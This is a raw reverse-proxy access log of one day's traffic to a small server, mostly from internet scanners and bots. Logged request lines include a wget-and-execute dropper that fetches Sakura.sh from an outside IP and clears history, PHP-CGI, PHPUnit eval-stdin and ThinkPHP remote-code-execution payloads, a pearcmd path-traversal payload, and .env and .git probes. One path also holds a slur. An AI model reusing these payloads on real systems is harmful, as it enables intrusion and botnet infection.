[Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" -[15/Feb/2026:01:50:01 +0000] 200 - GET http git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:01:50:01 +0000] 400 - GET http git.hanmocnn.co.kr "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" -[15/Feb/2026:01:52:11 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 139.59.231.238] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:01:52:11 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 139.59.231.238] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:01:52:12 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 139.59.231.238] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:01:54:10 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:01:54:31 +0000] 400 - GET https localhost "/" [Client 94.102.49.155] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:01:55:41 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 2.58.56.62] [Length 0] [Gzip -] "-" "-" -[15/Feb/2026:01:59:02 +0000] 200 - GET http 222.117.41.51 "/" [Client 44.211.135.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:00:56 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:02:00:59 +0000] 400 - GET https localhost "/" [Client 95.215.0.144] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:02:05:22 +0000] 200 - GET http 222.117.41.51 "/" [Client 162.216.150.206] [Length 568] [Gzip 1.86] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" -[15/Feb/2026:02:08:26 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:02:19:23 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:02:32:53 +0000] 200 - HEAD http 222.117.41.51 "/" [Client 141.76.94.12] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:114.0) Gecko/20100101 Firefox/114.0" "-" -[15/Feb/2026:02:43:40 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:02:44:08 +0000] 404 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0" "-" -[15/Feb/2026:02:44:08 +0000] 400 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0" "-" -[15/Feb/2026:02:44:09 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:02:44:09 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:02:44:10 +0000] 400 - GET http 222.117.41.51 "/" [Client 34.158.168.101] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Chrome/120.0.0.0" "-" -[15/Feb/2026:02:47:35 +0000] 200 - GET http 222.117.41.51 "/" [Client 195.3.221.86] [Length 1033] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:59:26 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:03:00:36 +0000] 200 - GET http 222.117.41.51 "/" [Client 139.59.181.152] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36" "-" -[15/Feb/2026:03:00:36 +0000] 400 - GET http 222.117.41.51 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" -[15/Feb/2026:03:02:53 +0000] 404 - GET http 222.117.41.51 "/HNAP1" [Client 139.59.181.152] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "http://222.117.41.51:80/" -[15/Feb/2026:03:03:22 +0000] 404 - POST http 222.117.41.51 "/onvif/device_service" [Client 139.59.181.152] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "http://222.117.41.51:80/" -[15/Feb/2026:03:03:23 +0000] 404 - GET http 222.117.41.51 "/PSIA/index" [Client 139.59.181.152] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "http://222.117.41.51:80/" -[15/Feb/2026:03:05:57 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[15/Feb/2026:03:07:41 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:03:10:31 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:03:11:41 +0000] 200 - GET http 222.117.41.51 "/" [Client 195.178.110.241] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[15/Feb/2026:03:32:54 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:03:53:46 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:03:58:49 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:04:00:23 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 64.226.70.144] [Length 1033] [Gzip -] "-" "-" -[15/Feb/2026:04:00:23 +0000] 404 - GET http 222.117.41.51 "/odinhttpcall1771128023" [Client 64.226.70.144] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" -[15/Feb/2026:04:00:23 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 64.226.70.144] [Length 1033] [Gzip -] "-" "-" -[15/Feb/2026:04:00:24 +0000] 404 - POST http 222.117.41.51 "/sdk" [Client 64.226.70.144] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" -[15/Feb/2026:04:00:24 +0000] 404 - GET http 222.117.41.51 "/evox/about" [Client 64.226.70.144] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" -[15/Feb/2026:04:00:24 +0000] 404 - GET http 222.117.41.51 "/HNAP1" [Client 64.226.70.144] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" -[15/Feb/2026:04:00:24 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 64.226.70.144] [Length 1033] [Gzip -] "-" "-" -[15/Feb/2026:04:00:25 +0000] 200 - GET http 222.117.41.51 "/" [Client 64.226.70.144] [Length 1033] [Gzip -] "-" "-" -[15/Feb/2026:04:00:26 +0000] 404 - GET http 222.117.41.51 "/cgi-bin/authLogin.cgi" [Client 209.38.212.21] [Length 150] [Gzip -] "Go-http-client/1.1" "-" -[15/Feb/2026:04:00:26 +0000] 404 - GET http 222.117.41.51 "/query?q=SHOW+DIAGNOSTICS" [Client 104.248.19.198] [Length 150] [Gzip -] "Go-http-client/1.1" "-" -[15/Feb/2026:04:00:26 +0000] 404 - GET http 222.117.41.51 "/v2/_catalog" [Client 209.38.212.21] [Length 150] [Gzip -] "Go-http-client/1.1" "-" -[15/Feb/2026:04:00:26 +0000] 404 - GET http 222.117.41.51 "/solr/admin/info/system" [Client 46.101.143.239] [Length 150] [Gzip -] "Go-http-client/1.1" "-" -[15/Feb/2026:04:00:26 +0000] 200 - GET http 222.117.41.51 "/" [Client 134.122.88.189] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" -[15/Feb/2026:04:00:26 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.71.51.160] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:04:00:26 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 178.128.203.23] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:04:00:26 +0000] 404 - GET http 222.117.41.51 "/solr/admin/cores?action=STATUS&wt=json" [Client 46.101.143.239] [Length 150] [Gzip -] "Go-http-client/1.1" "-" -[15/Feb/2026:04:00:26 +0000] 200 - GET http 222.117.41.51 "/" [Client 209.38.212.21] [Length 568] [Gzip 1.86] "Go-http-client/1.1" "-" -[15/Feb/2026:04:00:26 +0000] 400 - GET http 222.117.41.51 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" -[15/Feb/2026:04:00:26 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 178.128.203.23] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:04:00:27 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 209.38.212.21] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:04:02:30 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:04:12:12 +0000] 404 - GET http 222.117.41.51 "/.git/config" [Client 104.192.2.62] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" -[15/Feb/2026:04:21:38 +0000] 404 - GET http 222.117.41.51 "/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=uname%20-a;cd+%2Ftmp+%7C%7C+cd+%2Fvar%2Frun+%7C%7C+cd+%2Fmnt+%7C%7C+cd+%2Froot+%7C%7C+cd+%2F%3B+wget+http%3A%2F%2F146.103.53.43%2FSakura.sh%3B+chmod+777+%2A%3B+sh+Sakura.sh%3B+rm+-rf+%2A.sh%3B+history+-c" [Client 47.121.210.129] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36" "-" -[15/Feb/2026:04:25:28 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:04:29:08 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 198.235.24.235] [Length 1033] [Gzip -] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" -[15/Feb/2026:04:36:17 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[15/Feb/2026:04:42:24 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 138.68.130.42] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:04:42:24 +0000] 400 - - http localhost "-" [Client 138.68.130.42] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:04:47:33 +0000] 200 - GET http 222.117.41.51 "/" [Client 195.178.110.241] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:04:47:43 +0000] 404 - GET http 222.117.41.51 "/SDK/duckyisafaggot" [Client 195.178.110.241] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:04:49:19 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:04:51:40 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:04:57:48 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:05:08:50 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[15/Feb/2026:05:09:59 +0000] 200 - GET http 222.117.41.51 "/" [Client 43.156.232.190] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[15/Feb/2026:05:15:25 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:05:34:15 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 64.62.156.24] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:05:40:34 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:05:43:30 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 82.165.66.87] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:05:43:31 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 82.165.66.87] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:05:43:31 +0000] 404 - POST http 222.117.41.51 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:31 +0000] 405 - POST http 222.117.41.51 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 82.165.66.87] [Length 154] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:32 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:32 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:32 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:33 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:33 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:33 +0000] 404 - GET http 222.117.41.51 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:34 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:34 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:34 +0000] 404 - GET http 222.117.41.51 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:35 +0000] 404 - GET http 222.117.41.51 "/phpunit/Util/PHP/eval-stdin.php" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:35 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:35 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:36 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:36 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:36 +0000] 404 - GET http 222.117.41.51 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:37 +0000] 404 - GET http 222.117.41.51 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:37 +0000] 404 - GET http 222.117.41.51 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:37 +0000] 404 - GET http 222.117.41.51 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:38 +0000] 404 - GET http 222.117.41.51 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:38 +0000] 404 - GET http 222.117.41.51 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:38 +0000] 404 - GET http 222.117.41.51 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:39 +0000] 404 - GET http 222.117.41.51 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:39 +0000] 404 - GET http 222.117.41.51 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:39 +0000] 404 - GET http 222.117.41.51 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:40 +0000] 404 - GET http 222.117.41.51 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:40 +0000] 404 - GET http 222.117.41.51 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:40 +0000] 404 - GET http 222.117.41.51 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:41 +0000] 404 - GET http 222.117.41.51 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:41 +0000] 404 - GET http 222.117.41.51 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:42 +0000] 404 - GET http 222.117.41.51 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:42 +0000] 404 - GET http 222.117.41.51 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:42 +0000] 404 - GET http 222.117.41.51 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:43 +0000] 404 - GET http 222.117.41.51 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:43 +0000] 404 - GET http 222.117.41.51 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:43 +0000] 404 - GET http 222.117.41.51 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:44 +0000] 404 - GET http 222.117.41.51 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:44 +0000] 404 - GET http 222.117.41.51 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:44 +0000] 404 - GET http 222.117.41.51 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:45 +0000] 404 - GET http 222.117.41.51 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:45 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:45 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../tmp/index1" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:43:46 +0000] 404 - GET http 222.117.41.51 "/containers/json" [Client 82.165.66.87] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:05:47:40 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:05:51:37 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:06:05:26 +0000] 400 - GET http 222.117.41.51 "/.git/config" [Client 104.192.2.62] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.2; rv:139.0) Gecko/20100101 Firefox/139.0" "-" -[15/Feb/2026:06:06:15 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:06:07:25 +0000] 400 - GET http 222.117.41.51 "/" [Client 199.45.154.135] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[15/Feb/2026:06:07:26 +0000] 400 - - http localhost "-" [Client 199.45.154.135] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:06:07:33 +0000] 400 - GET http 222.117.41.51 "/login" [Client 199.45.154.135] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[15/Feb/2026:06:15:09 +0000] 200 - GET http 222.117.41.51 "/" [Client 68.183.2.105] [Length 568] [Gzip 1.86] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" -[15/Feb/2026:06:15:10 +0000] 400 - GET http 222.117.41.51 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" -[15/Feb/2026:06:29:17 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:06:29:32 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] 